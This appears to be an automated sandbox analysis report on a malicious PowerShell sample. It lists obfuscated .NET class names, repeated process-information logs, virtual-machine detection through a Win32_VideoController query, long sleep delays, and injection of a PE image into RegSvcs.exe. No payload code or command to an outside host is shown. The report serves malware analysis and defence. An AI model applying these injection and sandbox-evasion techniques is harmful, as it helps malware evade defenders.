              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.csHigh entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.csHigh entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.csHigh entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.csHigh entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.csHigh entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.1ac16e49e40.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csHigh entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'

              Persistence and Installation Behavior

              barindex
              Uses ipconfig to lookup or modify the Windows network settings
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3628Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3714Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1757Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8075Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3184Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: RegSvcs.exe, 00000004.00000002.3914283892.000000000145B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FD6008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
